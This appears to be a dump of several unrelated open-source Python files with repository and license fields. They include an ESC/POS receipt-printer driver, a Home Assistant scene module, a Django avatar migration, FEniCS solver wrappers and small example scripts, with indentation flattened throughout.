elif im_color > (255 * 3 / pattern_len * pattern_len) and im_color <= (255 * 3):
pix_line += im_pattern[-1]
break
pix_line += im_right
img_size[0] += im_border[1]
return (pix_line, img_size)
def image(self,path_img):
""" Open image file """
im_open = Image.open(path_img)
im = im_open.convert("RGB")
# Convert the RGB image in printable image
pix_line, img_size = self._convert_image(im)
self._print_image(pix_line, img_size)
def print_base64_image(self,img):
print 'print_b64_img'
id = md5.new(img).digest()
if id not in self.img_cache:
print 'not in cache'
img = img[img.find(',')+1:]
f = io.BytesIO('img')
f.write(base64.decodestring(img))
f.seek(0)
img_rgba = Image.open(f)
img = Image.new('RGB', img_rgba.size, (255,255,255))
channels = img_rgba.split()
if len(channels) > 1:
# use alpha channel as mask
img.paste(img_rgba, mask=channels[3])
else:
img.paste(img_rgba)
print 'convert image'
pix_line, img_size = self._convert_image(img)
print 'print image'
buffer = self._raw_print_image(pix_line, img_size)
self.img_cache[id] = buffer
print 'raw image'
self._raw(self.img_cache[id])
def qr(self,text):
""" Print QR Code for the provided string """
qr_code = qrcode.QRCode(version=4, box_size=4, border=1)
qr_code.add_data(text)
qr_code.make(fit=True)
qr_img = qr_code.make_image()
im = qr_img._img.convert("RGB")
# Convert the RGB image in printable image
self._convert_image(im)
def barcode(self, code, bc, width=255, height=2, pos='below', font='a'):
""" Print Barcode """
# Align Bar Code()
self._raw(TXT_ALIGN_CT)
# Height
if height >=2 or height <=6:
self._raw(BARCODE_HEIGHT)
else:
raise BarcodeSizeError()
# Width
if width >= 1 or width <=255:
self._raw(BARCODE_WIDTH)
else:
raise BarcodeSizeError()
# Font
if font.upper() == "B":
self._raw(BARCODE_FONT_B)
else: # DEFAULT FONT: A
self._raw(BARCODE_FONT_A)
# Position
if pos.upper() == "OFF":
self._raw(BARCODE_TXT_OFF)
elif pos.upper() == "BOTH":
self._raw(BARCODE_TXT_BTH)
elif pos.upper() == "ABOVE":
self._raw(BARCODE_TXT_ABV)
else: # DEFAULT POSITION: BELOW
self._raw(BARCODE_TXT_BLW)
# Type
if bc.upper() == "UPC-A":
self._raw(BARCODE_UPC_A)
elif bc.upper() == "UPC-E":
self._raw(BARCODE_UPC_E)
elif bc.upper() == "EAN13":
self._raw(BARCODE_EAN13)
elif bc.upper() == "EAN8":
self._raw(BARCODE_EAN8)
elif bc.upper() == "CODE39":
self._raw(BARCODE_CODE39)
elif bc.upper() == "ITF":
self._raw(BARCODE_ITF)
elif bc.upper() == "NW7":
self._raw(BARCODE_NW7)
else:
raise BarcodeTypeError()
# Print Code
if code:
self._raw(code)
else:
raise exception.BarcodeCodeError()
def receipt(self,xml):
"""
Prints an xml based receipt definition
"""
def strclean(string):
if not string:
string = ''
string = string.strip()
string = re.sub('\s+',' ',string)
return string
def format_value(value, decimals=3, width=0, decimals_separator='.', thousands_separator=',', autoint=False, symbol='', position='after'):
decimals = max(0,int(decimals))
width = max(0,int(width))
value = float(value)
if autoint and math.floor(value) == value:
decimals = 0
if width == 0:
width = ''
if thousands_separator:
formatstr = "{:"+str(width)+",."+str(decimals)+"f}"
else:
formatstr = "{:"+str(width)+"."+str(decimals)+"f}"
ret = formatstr.format(value)
ret = ret.replace(',','COMMA')
ret = ret.replace('.','DOT')
ret = ret.replace('COMMA',thousands_separator)
ret = ret.replace('DOT',decimals_separator)
if symbol:
if position == 'after':
ret = ret + symbol
else:
ret = symbol + ret
return ret
def print_elem(stylestack, serializer, elem, indent=0):
elem_styles = {
'h1': {'bold': 'on', 'size':'double'},
'h2': {'size':'double'},
'h3': {'bold': 'on', 'size':'double-height'},
'h4': {'size': 'double-height'},
'h5': {'bold': 'on'},
'em': {'font': 'b'},
'b': {'bold': 'on'},
}
stylestack.push()
if elem.tag in elem_styles:
stylestack.set(elem_styles[elem.tag])
stylestack.set(elem.attrib)
if elem.tag in ('p','div','section','article','receipt','header','footer','li','h1','h2','h3','h4','h5'):
serializer.start_block(stylestack)
serializer.text(elem.text)
for child in elem:
print_elem(stylestack,serializer,child)
serializer.start_inline(stylestack)
serializer.text(child.tail)
serializer.end_entity()
serializer.end_entity()
elif elem.tag in ('span','em','b','left','right'):
serializer.start_inline(stylestack)
serializer.text(elem.text)
for child in elem:
print_elem(stylestack,serializer,child)
serializer.start_inline(stylestack)
serializer.text(child.tail)
serializer.end_entity()
serializer.end_entity()
elif elem.tag == 'value':
serializer.start_inline(stylestack)
serializer.pre(format_value(
elem.text,
decimals=stylestack.get('value-decimals'),
width=stylestack.get('value-width'),
decimals_separator=stylestack.get('value-decimals-separator'),
thousands_separator=stylestack.get('value-thousands-separator'),
autoint=(stylestack.get('value-autoint') == 'on'),
symbol=stylestack.get('value-symbol'),
position=stylestack.get('value-symbol-position')
))
serializer.end_entity()
elif elem.tag == 'line':
width = stylestack.get('width')
if stylestack.get('size') in ('double', 'double-width'):
width = width / 2
lineserializer = XmlLineSerializer(stylestack.get('indent')+indent,stylestack.get('tabwidth'),width,stylestack.get('line-ratio'))
serializer.start_block(stylestack)
for child in elem:
if child.tag == 'left':
print_elem(stylestack,lineserializer,child,indent=indent)
elif child.tag == 'right':
lineserializer.start_right()
print_elem(stylestack,lineserializer,child,indent=indent)
serializer.pre(lineserializer.get_line())
serializer.end_entity()
elif elem.tag == 'ul':
serializer.start_block(stylestack)
bullet = stylestack.get('bullet')
for child in elem:
if child.tag == 'li':
serializer.style(stylestack)
serializer.raw(' ' * indent * stylestack.get('tabwidth') + bullet)
print_elem(stylestack,serializer,child,indent=indent+1)
serializer.end_entity()
elif elem.tag == 'ol':
cwidth = len(str(len(elem))) + 2
i = 1
serializer.start_block(stylestack)
for child in elem:
if child.tag == 'li':
serializer.style(stylestack)
serializer.raw(' ' * indent * stylestack.get('tabwidth') + ' ' + (str(i)+')').ljust(cwidth))
i = i + 1
print_elem(stylestack,serializer,child,indent=indent+1)
serializer.end_entity()
elif elem.tag == 'pre':
serializer.start_block(stylestack)
serializer.pre(elem.text)
serializer.end_entity()
elif elem.tag == 'hr':
width = stylestack.get('width')
if stylestack.get('size') in ('double', 'double-width'):
width = width / 2
serializer.start_block(stylestack)
serializer.text('-'*width)
serializer.end_entity()
elif elem.tag == 'br':
serializer.linebreak()
elif elem.tag == 'img':
if 'src' in elem.attrib and 'data:' in elem.attrib['src']:
self.print_base64_image(elem.attrib['src'])
elif elem.tag == 'barcode' and 'encoding' in elem.attrib:
serializer.start_block(stylestack)
self.barcode(strclean(elem.text),elem.attrib['encoding'])
serializer.end_entity()
elif elem.tag == 'cut':
self.cut()
elif elem.tag == 'partialcut':
self.cut(mode='part')
elif elem.tag == 'cashdraw':
self.cashdraw(2)
self.cashdraw(5)
stylestack.pop()
try:
stylestack = StyleStack()
serializer = XmlSerializer(self)
root = ET.fromstring(xml.encode('utf-8'))
self._raw(stylestack.to_escpos())
print_elem(stylestack,serializer,root)
if 'open-cashdrawer' in root.attrib and root.attrib['open-cashdrawer'] == 'true':
self.cashdraw(2)
self.cashdraw(5)
if not 'cut' in root.attrib or root.attrib['cut'] == 'true' :
self.cut()
except Exception as e:
errmsg = str(e)+'\n'+'-'*48+'\n'+traceback.format_exc() + '-'*48+'\n'
self.text(errmsg)
self.cut()
raise e
def text(self,txt):
""" Print Utf8 encoded alpha-numeric text """
if not txt:
return
try:
txt = txt.decode('utf-8')
except:
try:
txt = txt.decode('utf-16')
except:
pass
self.extra_chars = 0
def encode_char(char):
"""
Encodes a single utf-8 character into a sequence of
esc-pos code page change instructions and character declarations
"""
char_utf8 = char.encode('utf-8')
encoded = ''
encoding = self.encoding # we reuse the last encoding to prevent code page switches at every character
encodings = {
# TODO use ordering to prevent useless switches
# TODO Support other encodings not natively supported by python ( Thai, Khazakh, Kanjis )
'cp437': TXT_ENC_PC437,
'cp850': TXT_ENC_PC850,
'cp852': TXT_ENC_PC852,
'cp857': TXT_ENC_PC857,
'cp858': TXT_ENC_PC858,
'cp860': TXT_ENC_PC860,
'cp863': TXT_ENC_PC863,
'cp865': TXT_ENC_PC865,
'cp866': TXT_ENC_PC866,
'cp862': TXT_ENC_PC862,
'cp720': TXT_ENC_PC720,
'iso8859_2': TXT_ENC_8859_2,
'iso8859_7': TXT_ENC_8859_7,
'iso8859_9': TXT_ENC_8859_9,
'cp1254' : TXT_ENC_WPC1254,
'cp1255' : TXT_ENC_WPC1255,
'cp1256' : TXT_ENC_WPC1256,
'cp1257' : TXT_ENC_WPC1257,
'cp1258' : TXT_ENC_WPC1258,
'katakana' : TXT_ENC_KATAKANA,
}
remaining = copy.copy(encodings)
if not encoding :
encoding = 'cp437'
while True: # Trying all encoding until one succeeds
try:
if encoding == 'katakana': # Japanese characters
if jcconv:
# try to convert japanese text to a half-katakanas
kata = jcconv.kata2half(jcconv.hira2kata(char_utf8))
if kata != char_utf8:
self.extra_chars += len(kata.decode('utf-8')) - 1
# the conversion may result in multiple characters
return encode_str(kata.decode('utf-8'))
else:
kata = char_utf8
if kata in TXT_ENC_KATAKANA_MAP:
encoded = TXT_ENC_KATAKANA_MAP[kata]
break
else:
raise ValueError()
else:
encoded = char.encode(encoding)
break
except ValueError: #the encoding failed, select another one and retry
if encoding in remaining:
del remaining[encoding]
if len(remaining) >= 1:
encoding = remaining.items()[0][0]
else:
encoding = 'cp437'
encoded = '\xb1' # could not encode, output error character
break;
if encoding != self.encoding:
# if the encoding changed, remember it and prefix the character with
# the esc-pos encoding change sequence
self.encoding = encoding
encoded = encodings[encoding] + encoded
return encoded
def encode_str(txt):
buffer = ''
for c in txt:
buffer += encode_char(c)
return buffer
txt = encode_str(txt)
# if the utf-8 -> codepage conversion inserted extra characters,
# remove double spaces to try to restore the original string length
# and prevent printing alignment issues
while self.extra_chars > 0:
dspace = txt.find(' ')
if dspace > 0:
txt = txt[:dspace] + txt[dspace+1:]
self.extra_chars -= 1
else:
break
self._raw(txt)
def set(self, align='left', font='a', type='normal', width=1, height=1):
""" Set text properties """
# Align
if align.upper() == "CENTER":
self._raw(TXT_ALIGN_CT)
elif align.upper() == "RIGHT":
self._raw(TXT_ALIGN_RT)
elif align.upper() == "LEFT":
self._raw(TXT_ALIGN_LT)
# Font
if font.upper() == "B":
self._raw(TXT_FONT_B)
else: # DEFAULT FONT: A
self._raw(TXT_FONT_A)
# Type
if type.upper() == "B":
self._raw(TXT_BOLD_ON)
self._raw(TXT_UNDERL_OFF)
elif type.upper() == "U":
self._raw(TXT_BOLD_OFF)
self._raw(TXT_UNDERL_ON)
elif type.upper() == "U2":
self._raw(TXT_BOLD_OFF)
self._raw(TXT_UNDERL2_ON)
elif type.upper() == "BU":
self._raw(TXT_BOLD_ON)
self._raw(TXT_UNDERL_ON)
elif type.upper() == "BU2":
self._raw(TXT_BOLD_ON)
self._raw(TXT_UNDERL2_ON)
elif type.upper == "NORMAL":
self._raw(TXT_BOLD_OFF)
self._raw(TXT_UNDERL_OFF)
# Width
if width == 2 and height != 2:
self._raw(TXT_NORMAL)
self._raw(TXT_2WIDTH)
elif height == 2 and width != 2:
self._raw(TXT_NORMAL)
self._raw(TXT_2HEIGHT)
elif height == 2 and width == 2:
self._raw(TXT_2WIDTH)
self._raw(TXT_2HEIGHT)
else: # DEFAULT SIZE: NORMAL
self._raw(TXT_NORMAL)
def cut(self, mode=''):
""" Cut paper """
# Fix the size between last line and cut
# TODO: handle this with a line feed
self._raw("\n\n\n\n\n\n")
if mode.upper() == "PART":
self._raw(PAPER_PART_CUT)
else: # DEFAULT MODE: FULL CUT
self._raw(PAPER_FULL_CUT)
def cashdraw(self, pin):
""" Send pulse to kick the cash drawer """
if pin == 2:
self._raw(CD_KICK_2)
elif pin == 5:
self._raw(CD_KICK_5)
else:
raise CashDrawerError()
def hw(self, hw):
""" Hardware operations """
if hw.upper() == "INIT":
self._raw(HW_INIT)
elif hw.upper() == "SELECT":
self._raw(HW_SELECT)
elif hw.upper() == "RESET":
self._raw(HW_RESET)
else: # DEFAULT: DOES NOTHING
pass
def control(self, ctl):
""" Feed control sequences """
if ctl.upper() == "LF":
self._raw(CTL_LF)
elif ctl.upper() == "FF":
self._raw(CTL_FF)
elif ctl.upper() == "CR":
self._raw(CTL_CR)
elif ctl.upper() == "HT":
self._raw(CTL_HT)
elif ctl.upper() == "VT":
self._raw(CTL_VT)
| agpl-3.0 |
molobrakos/home-assistant | homeassistant/components/homeassistant/scene.py | 8 | 2923 | """Allow users to set and activate scenes."""
from collections import namedtuple
import voluptuous as vol
from homeassistant.const import (
ATTR_ENTITY_ID, ATTR_STATE, CONF_ENTITIES, CONF_NAME, CONF_PLATFORM,
STATE_OFF, STATE_ON)
from homeassistant.core import State
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.state import HASS_DOMAIN, async_reproduce_state
from homeassistant.components.scene import STATES, Scene
PLATFORM_SCHEMA = vol.Schema({
vol.Required(CONF_PLATFORM): HASS_DOMAIN,
vol.Required(STATES): vol.All(
cv.ensure_list,
[
{
vol.Required(CONF_NAME): cv.string,
vol.Required(CONF_ENTITIES): {
cv.entity_id: vol.Any(str, bool, dict)
},
}
]
),
}, extra=vol.ALLOW_EXTRA)
SCENECONFIG = namedtuple('SceneConfig', [CONF_NAME, STATES])
async def async_setup_platform(hass, config, async_add_entities,
discovery_info=None):
"""Set up home assistant scene entries."""
scene_config = config.get(STATES)
async_add_entities(HomeAssistantScene(
hass, _process_config(scene)) for scene in scene_config)
return True
def _process_config(scene_config):
"""Process passed in config into a format to work with.
Async friendly.
"""
name = scene_config.get(CONF_NAME)
states = {}
c_entities = dict(scene_config.get(CONF_ENTITIES, {}))
for entity_id in c_entities:
if isinstance(c_entities[entity_id], dict):
entity_attrs = c_entities[entity_id].copy()
state = entity_attrs.pop(ATTR_STATE, None)
attributes = entity_attrs
else:
state = c_entities[entity_id]
attributes = {}
# YAML translates 'on' to a boolean
# http://yaml.org/type/bool.html
if isinstance(state, bool):
state = STATE_ON if state else STATE_OFF
else:
state = str(state)
states[entity_id.lower()] = State(entity_id, state, attributes)
return SCENECONFIG(name, states)
class HomeAssistantScene(Scene):
"""A scene is a group of entities and the states we want them to be."""
def __init__(self, hass, scene_config):
"""Initialize the scene."""
self.hass = hass
self.scene_config = scene_config
@property
def name(self):
"""Return the name of the scene."""
return self.scene_config.name
@property
def device_state_attributes(self):
"""Return the scene state attributes."""
return {
ATTR_ENTITY_ID: list(self.scene_config.states.keys()),
}
async def async_activate(self):
"""Activate scene. Try to get entities into requested state."""
await async_reproduce_state(
self.hass, self.scene_config.states.values(), True)
| apache-2.0 |
jbornschein/y2k | show-layerwise.py | 6 | 1957 | #!/usr/bin/env python
from __future__ import division
import sys
import logging
from time import time
import cPickle as pickle
import numpy as np
import h5py
import pylab
#import theano
#import theano.tensor as T
_logger = logging.getLogger()
#=============================================================================
if __name__ == "__main__":
import argparse
logger = logging.getLogger(__name__)
parser = argparse.ArgumentParser()
parser.add_argument('--verbose', '-v', action="store_true", default=False)
parser.add_argument('--dataset', '-d', default="valiset")
parser.add_argument('--samples', '-s', default=100)
parser.add_argument('--stacked', action="store_true", default=False)
parser.add_argument('out_dir', nargs=1)
args = parser.parse_args()
if args.verbose:
level = logging.DEBUG
else:
level = logging.INFO
FORMAT = '[%(asctime)s] %(message)s'
DATEFMT = "%H:%M:%S"
logging.basicConfig(format=FORMAT, datefmt=DATEFMT, level=level)
fname = args.out_dir[0]+"/results.h5"
table = "%s.spl%d.Hp" % (args.dataset, args.samples)
try:
with h5py.File(fname, "r") as h5:
Hp = h5[table][:]
except KeyError, e:
logger.info("Failed to read data from %s: %s" % (fname, e))
exit(1)
except IOError, e:
logger.info("Failed to open %s fname: %s" % (fname, e))
exit(1)
epochs = Hp.shape[0]
n_layers = Hp.shape[1]
if args.stacked:
ylim = 2*Hp[-1].sum()
pylab.ylim([ylim, 0])
pylab.stackplot(np.arange(epochs), Hp[:,::-1].T)
else:
ylim = 2*Hp[-1].min()
pylab.ylim([ylim, 0])
pylab.plot(Hp)
#pylab.figsize(12, 8)
pylab.xlabel("Epochs")
#pylab.ylabel("avg_{x~testdata} log( E_{h~q}[p(x,h)/q(h|x)]")
pylab.legend(["layer %d" % i for i in xrange(n_layers)], loc="lower right")
pylab.show(block=True)
| agpl-3.0 |
imgmix/django-avatar | avatar/south_migrations/0001_initial.py | 4 | 4766 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Avatar'
db.create_table('avatar_avatar', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
('primary', self.gf('django.db.models.fields.BooleanField')(default=False)),
('avatar', self.gf('django.db.models.fields.files.ImageField')(max_length=1024, blank=True)),
('date_uploaded', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
))
db.send_create_signal('avatar', ['Avatar'])
def backwards(self, orm):
# Deleting model 'Avatar'
db.delete_table('avatar_avatar')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'user_set'", 'blank': 'True', 'to': "orm['auth.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'user_set'", 'blank': 'True', 'to': "orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'avatar.avatar': {
'Meta': {'object_name': 'Avatar'},
'avatar': ('django.db.models.fields.files.ImageField', [], {'max_length': '1024', 'blank': 'True'}),
'date_uploaded': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'primary': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['avatar']
| bsd-3-clause |
ellipsis14/dolfin-adjoint | timestepping/python/timestepping/fenics_overrides.py | 1 | 8590 | #!/usr/bin/env python2
# Copyright (C) 2011-2012 by Imperial College London
# Copyright (C) 2013 University of Oxford
# Copyright (C) 2014 University of Edinburgh
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3 of the License
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import copy
import dolfin
import ufl
from exceptions import *
from fenics_utils import *
__all__ = \
[
"_KrylovSolver",
"_LinearSolver",
"_LUSolver",
"_assemble",
"_assemble_classes",
"DirichletBC",
"LinearSolver",
"action",
"adjoint",
"assemble",
"derivative",
"homogenize",
"lhs",
"replace",
"rhs"
]
# Assembly and linear solver functions and classes used in this module. These
# can be overridden externally.
_KrylovSolver = dolfin.KrylovSolver
_LinearSolver = dolfin.LinearSolver
_LUSolver = dolfin.LUSolver
_assemble = dolfin.assemble
class DirichletBC(dolfin.DirichletBC):
"""
Wrapper for DOLFIN DirichletBC. Adds homogenized method.
"""
def __init__(self, *args, **kwargs):
dolfin.DirichletBC.__init__(self, *args, **kwargs)
self.__hbc = None
return
def homogenized(self):
"""
Return a homogenised version of this DirichletBC.
"""
if self.__hbc is None:
self.__hbc = dolfin.DirichletBC(self.function_space(), self.value(), *self.domain_args, method = self.method())
self.__hbc.homogenize()
if hasattr(self, "_time_static"):
self.__hbc._time_static = self._time_static
return self.__hbc
def homogenize(bc):
"""
Return a homogenised version of the supplied DirichletBC.
"""
if isinstance(bc, DirichletBC):
return bc.homogenized()
elif isinstance(bc, dolfin.cpp.DirichletBC):
hbc = DirichletBC(bc.function_space(), bc.value(), *bc.domain_args, method = bc.method())
hbc.homogenize()
if hasattr(bc, "_time_static"):
hbc._time_static = bc._time_static
else:
raise InvalidArgumentException("bc must be a DirichletBC")
return hbc
def LinearSolver(*args, **kwargs):
"""
Return a linear solver.
Arguments: One of:
1. Arguments as accepted by the DOLFIN LinearSolver constructor.
or:
2. A dictionary of linear solver parameters.
"""
if not len(args) == 1 or not len(kwargs) == 0 or not isinstance(args[0], dict):
return _LinearSolver(*args, **kwargs)
linear_solver_parameters = args[0]
linear_solver = "lu"
pc = None
kp = {}
lp = {}
for key in linear_solver_parameters:
if key == "linear_solver":
linear_solver = linear_solver_parameters[key]
elif key == "preconditioner":
pc = linear_solver_parameters[key]
elif key == "krylov_solver":
kp = linear_solver_parameters[key]
elif key == "lu_solver":
lp = linear_solver_parameters[key]
elif key in ["print_matrix", "print_rhs", "reset_jacobian", "symmetric"]:
raise NotImplementedException("Unsupported linear solver parameter: %s" % key)
else:
raise InvalidArgumentException("Unexpected linear solver parameter: %s" % key)
if linear_solver in ["default", "direct", "lu"]:
is_lu = True
linear_solver = "default"
elif linear_solver == "iterative":
is_lu = False
linear_solver = "gmres"
else:
is_lu = dolfin.has_lu_solver_method(linear_solver)
if is_lu:
linear_solver = _LUSolver(linear_solver)
linear_solver.parameters.update(lp)
else:
if pc is None:
linear_solver = _KrylovSolver(linear_solver)
else:
linear_solver = _KrylovSolver(linear_solver, pc)
linear_solver.parameters.update(kp)
return linear_solver
def adjoint(form, reordered_arguments = None, adjoint_arguments = None):
"""
Wrapper for the DOLFIN adjoint function. Accepts the additional optional
adjoint_arguments, which if supplied should be a tuple of Argument s
corresponding to the adjoint test and trial functions. Correctly handles
QForm s.
"""
if adjoint_arguments is None:
a_form = dolfin.adjoint(form, reordered_arguments = reordered_arguments)
elif not reordered_arguments is None:
raise InvalidArgumentException("Cannot supply both reordered_arguments and adjoint_arguments keyword arguments")
else:
if not len(adjoint_arguments) == 2 \
or not isinstance(adjoint_arguments[0], ufl.argument.Argument) \
or not isinstance(adjoint_arguments[1], ufl.argument.Argument):
raise InvalidArgumentException("adjoint_arguments must be a pair of Argument s")
a_test, a_trial = adjoint_arguments
a_form = dolfin.adjoint(form)
test, trial = extract_test_and_trial(a_form)
if not test.element() == a_test.element() or not trial.element() == a_trial.element():
raise InvalidArgumentException("Invalid adjoint_arguments")
a_form = replace(a_form, {test:a_test, trial:a_trial})
if isinstance(form, QForm):
return QForm(a_form, quadrature_degree = form.quadrature_degree())
else:
return a_form
def replace(e, mapping):
"""
Wrapper for the DOLFIN replace function. Correctly handles QForm s.
"""
if not isinstance(mapping, dict):
raise InvalidArgumentException("mapping must be a dictionary")
if len(mapping) == 0:
return e
ne = dolfin.replace(e, mapping)
if isinstance(e, QForm):
return QForm(ne, quadrature_degree = form_quadrature_degree(e))
else:
return ne
def lhs(form):
"""
Wrapper for the DOLFIN lhs function. Correctly handles QForm s.
"""
if not isinstance(form, ufl.form.Form):
raise InvalidArgumentException("form must be a Form")
nform = dolfin.lhs(form)
if isinstance(form, QForm):
return QForm(nform, quadrature_degree = form_quadrature_degree(form))
else:
return nform
def rhs(form):
"""
Wrapper for the DOLFIN rhs function. Correctly handles QForm s.
"""
if not isinstance(form, ufl.form.Form):
raise InvalidArgumentException("form must be a Form")
nform = dolfin.rhs(form)
if isinstance(form, QForm):
return QForm(nform, quadrature_degree = form_quadrature_degree(form))
else:
return nform
def derivative(form, u, du = None, expand = True):
"""
Wrapper for the DOLFIN derivative function. This attempts to select an
appropriate du if one is not supplied. Correctly handles QForm s. By default
the returned Form is first expanded using ufl.algorithms.expand_derivatives.
This can be disabled if the optional expand argument is False.
"""
if du is None:
if isinstance(u, dolfin.Constant):
du = dolfin.Constant(1.0)
elif isinstance(u, dolfin.Function):
rank = form_rank(form)
if rank == 0:
du = dolfin.TestFunction(u.function_space())
elif rank == 1:
du = dolfin.TrialFunction(u.function_space())
der = dolfin.derivative(form, u, du = du)
if expand:
der = ufl.algorithms.expand_derivatives(der)
if isinstance(form, QForm):
return QForm(der, quadrature_degree = form.quadrature_degree())
else:
return der
def action(form, coefficient):
"""
Wrapper for the DOLFIN action function. Correctly handles QForm s.
"""
if not isinstance(form, ufl.form.Form):
raise InvalidArgumentException("form must be a Form")
if not isinstance(coefficient, dolfin.Function):
raise InvalidArgumentException("coefficient must be a Function")
nform = dolfin.action(form, coefficient)
if isinstance(form, QForm):
return QForm(nform, quadrature_degree = form_quadrature_degree(form))
else:
return nform
_assemble_classes = []
def assemble(*args, **kwargs):
"""
Wrapper for the DOLFIN assemble function. Correctly handles PAForm s,
TimeSystem s and QForm s.
"""
if isinstance(args[0], QForm):
if "form_compiler_parameters" in kwargs:
raise InvalidArgumentException("Cannot supply form_compiler_parameters argument when assembling a QForm")
return _assemble(form_compiler_parameters = args[0].form_compiler_parameters(), *args, **kwargs)
elif isinstance(args[0], tuple(_assemble_classes)):
return args[0].assemble(*args[1:], **kwargs)
else:
return _assemble(*args, **kwargs)
| lgpl-3.0 |
arne-cl/pattern | examples/05-vector/01-document.py | 21 | 3205 | import os, sys; sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", ".."))
import codecs
from pattern.vector import Document, PORTER, LEMMA
# A Document is a "bag-of-words" that splits a string into words and counts them.
# A list of words or dictionary of (word, count)-items can also be given.
# Words (or more generally "features") and their word count ("feature weights")
# can be used to compare documents. The word count in a document is normalized
# between 0.0-1.0 so that shorted documents can be compared to longer documents.
# Words can be stemmed or lemmatized before counting them.
# The purpose of stemming is to bring variant forms a word together.
# For example, "conspiracy" and "conspired" are both stemmed to "conspir".
# Nowadays, lemmatization is usually preferred over stemming,
# e.g., "conspiracies" => "conspiracy", "conspired" => "conspire".
s = """
The shuttle Discovery, already delayed three times by technical problems and bad weather,
was grounded again Friday, this time by a potentially dangerous gaseous hydrogen leak
in a vent line attached to the ship's external tank.
The Discovery was initially scheduled to make its 39th and final flight last Monday,
bearing fresh supplies and an intelligent robot for the International Space Station.
But complications delayed the flight from Monday to Friday,
when the hydrogen leak led NASA to conclude that the shuttle would not be ready to launch
before its flight window closed this Monday.
"""
# With threshold=1, only words that occur more than once are counted.
# With stopwords=False, words like "the", "and", "I", "is" are ignored.
document = Document(s, threshold=1, stopwords=False)
print document.words
print
# The /corpus folder contains texts mined from Wikipedia.
# Below is the mining script (we already executed it for you):
#import os, codecs
#from pattern.web import Wikipedia
#
#w = Wikipedia()
#for q in (
# "badger", "bear", "dog", "dolphin", "lion", "parakeet",
# "rabbit", "shark", "sparrow", "tiger", "wolf"):
# s = w.search(q, cached=True)
# s = s.plaintext()
# print os.path.join("corpus2", q+".txt")
# f = codecs.open(os.path.join("corpus2", q+".txt"), "w", encoding="utf-8")
# f.write(s)
# f.close()
# Loading a document from a text file:
f = os.path.join(os.path.dirname(__file__), "corpus", "wolf.txt")
s = codecs.open(f, encoding="utf-8").read()
document = Document(s, name="wolf", stemmer=PORTER)
print document
print document.keywords(top=10) # (weight, feature)-items.
print
# Same document, using lemmatization instead of stemming (slower):
document = Document(s, name="wolf", stemmer=LEMMA)
print document
print document.keywords(top=10)
print
# In summary, a document is a bag-of-words representation of a text.
# Bag-of-words means that the word order is discarded.
# The dictionary of words (features) and their normalized word count (weights)
# is also called the document vector:
document = Document("a black cat and a white cat", stopwords=True)
print document.words
print document.vector.features
for feature, weight in document.vector.items():
print feature, weight
# Document vectors can be bundled into a Model (next example). | bsd-3-clause |
Huyuwei/tvm | topi/python/topi/testing/__init__.py | 1 | 1285 | """TOPI Testing Util functions.
Used to verify the correctness of operators in TOPI .
"""
from __future__ import absolute_import as _abs
from .conv2d_hwcn_python import conv2d_hwcn_python
from .conv2d_nchw_python import conv2d_nchw_python
from .conv2d_nhwc_python import conv2d_nhwc_python
